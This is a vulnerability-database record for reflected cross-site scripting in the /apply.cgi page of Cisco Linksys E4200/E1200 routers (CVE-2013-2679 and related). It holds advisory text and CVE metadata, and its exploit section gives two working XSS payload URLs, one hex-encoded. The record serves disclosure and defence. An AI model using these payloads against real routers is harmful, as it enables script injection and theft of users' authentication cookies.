ID

VAR-E-201304-0093


CVE

cve_id:CVE-2013-2679

Trust: 2.9

cve_id:CVE-2013-2682

Trust: 0.8

cve_id:CVE-2013-2678

Trust: 0.8

cve_id:CVE-2013-2680

Trust: 0.5

cve_id:CVE-2013-2681

Trust: 0.5

cve_id:CVE-2013-2683

Trust: 0.5

cve_id:CVE-2013-2684

Trust: 0.5

sources: BID: 59717 // BID: 59710 // BID: 59558 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501 // EDBNET: 59594

EDB ID

38501


TITLE

Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38501

DESCRIPTION

Cisco Linksys E4200 - '/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities. CVE-2013-2679CVE-93060 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 38501

AFFECTED PRODUCTS

vendor:ciscomodel:linksys e4200scope: - version: -

Trust: 1.5

vendor:ciscomodel:linksys e4200 buildscope:eqversion:1.0.057

Trust: 0.6

vendor:ciscomodel:linksys e1200 n300scope:eqversion:/

Trust: 0.5

sources: BID: 59717 // BID: 59710 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501

EXPLOIT

source: https://www.securityfocus.com/bid/59558/info

The Cisco Linksys E1200 N300 router is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Cisco Linksys E1200 N300 running firmware 2.0.04 is vulnerable.

http://www.example.com/apply.cgi?submit_button=%27%3b%20%3C%2fscript%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E%20%27

http://www.example.com/apply.cgi?submit_button=index%27%3b%20%3c%2f%73%63%72%69%70%74%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%20%27&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&switch_mode=0&hnap_devicename=Cisco10002&need_reboot=0&user_language=&wait_time=0&dhcp_start=100&dhcp_start_conflict=0&lan_ipaddr=4&ppp_demand_pppoe=9&ppp_demand_pptp=9&ppp_demand_l2tp=9&ppp_demand_hb=9&wan_ipv6_proto=dhcp-tunnel&detect_lang=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&machine_name=Cisco10002&lan_proto=dhcp&dhcp_check=&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1

Trust: 1.0

sources: EXPLOIT-DB: 38501

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38501

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38501

TYPE

'/apply.cgi' Multiple Cross-Site Scripting Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 38501

TAGS

tag:exploit

Trust: 1.0

tag:xss

Trust: 1.0

tag:local

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:file inclusion

Trust: 0.5

sources: PACKETSTORM: 122342 // PACKETSTORM: 121551

CREDITS

Carl Benedict

Trust: 0.6

sources: EXPLOIT-DB: 38501

EXTERNAL IDS

db:NVDid:CVE-2013-2679

Trust: 2.9

db:BIDid:59558

Trust: 1.9

db:EXPLOIT-DBid:38501

Trust: 1.6

db:NVDid:CVE-2013-2682

Trust: 0.8

db:NVDid:CVE-2013-2678

Trust: 0.8

db:EDBNETid:59594

Trust: 0.6

db:PACKETSTORMid:122342

Trust: 0.5

db:NVDid:CVE-2013-2680

Trust: 0.5

db:NVDid:CVE-2013-2683

Trust: 0.5

db:NVDid:CVE-2013-2681

Trust: 0.5

db:NVDid:CVE-2013-2684

Trust: 0.5

db:PACKETSTORMid:121551

Trust: 0.5

db:BIDid:59717

Trust: 0.3

db:BIDid:59710

Trust: 0.3

sources: BID: 59717 // BID: 59710 // BID: 59558 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501 // EDBNET: 59594

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-2679

Trust: 2.6

url:https://www.securityfocus.com/bid/59558/info

Trust: 1.0

url:http://www.cloudscan.me/2013/05/xss-lfi-linksys-e4200-firmware-0d.html

Trust: 0.6

url:http://support.linksys.com/en-us/support/routers/e4200

Trust: 0.6

url:https://www.exploit-db.com/exploits/38501/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2013-2681

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2680

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2682

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2684

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2678

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2013-2683

Trust: 0.5

url:http://www.cisco.com

Trust: 0.3

sources: BID: 59717 // BID: 59710 // BID: 59558 // PACKETSTORM: 122342 // PACKETSTORM: 121551 // EXPLOIT-DB: 38501 // EDBNET: 59594

SOURCES

db:BIDid:59717
db:BIDid:59710
db:BIDid:59558
db:PACKETSTORMid:122342
db:PACKETSTORMid:121551
db:EXPLOIT-DBid:38501
db:EDBNETid:59594

LAST UPDATE DATE

2022-07-27T09:32:53.760000+00:00


SOURCES UPDATE DATE

db:BIDid:59717date:2013-05-06T00:00:00
db:BIDid:59710date:2013-05-06T00:00:00
db:BIDid:59558date:2013-07-10T14:22:00

SOURCES RELEASE DATE

db:BIDid:59717date:2013-05-06T00:00:00
db:BIDid:59710date:2013-05-06T00:00:00
db:BIDid:59558date:2013-04-27T00:00:00
db:PACKETSTORMid:122342date:2013-07-10T21:52:09
db:PACKETSTORMid:121551date:2013-05-07T20:22:22
db:EXPLOIT-DBid:38501date:2013-04-27T00:00:00
db:EDBNETid:59594date:2013-04-27T00:00:00